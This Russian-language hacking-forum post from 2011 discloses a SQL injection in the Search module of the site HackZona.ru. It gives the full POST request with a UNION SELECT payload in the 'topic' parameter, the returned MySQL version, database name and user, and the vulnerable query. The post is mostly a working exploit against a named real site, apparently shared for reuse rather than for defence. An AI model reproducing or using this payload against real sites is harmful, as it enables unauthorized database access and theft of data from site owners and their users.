07.11.2011, 17:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
HackZona.ru
CY200 PR2
concat_ws(0x3b,version(),database(),user())
POST /hz.php?name=Search HTTP/1.1
Тело запроса:
Код:
Code:
query=s&topic=26' AND 1=2 UNION SELECT 1,2,3,4,5,6,CONCAT_WS(0x3b,version(),database(),user()),8,9,10,11,12,13 # &category=0&author=123&days=7&type=stories
Код:
Code:
5.1.42;hz4647;hz4647@localhost
Запрос там кстати очень интересный:
[CODE]
Code:
select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, s.counter, a.url, s.comments, s.topic, s.score, s.ratings from voov_stories s, voov_authors a where s.aid=a.aid AND (s.title LIKE '%s%' OR s.hometext LIKE '%s%' OR s.bodytext LIKE '%s%' OR s.notes LIKE '%s%') AND s.informant='123' AND s.topic='26[SQL INJ]' AND TO_DAYS(NOW()) - TO_DAYS(time)
|
|
|
|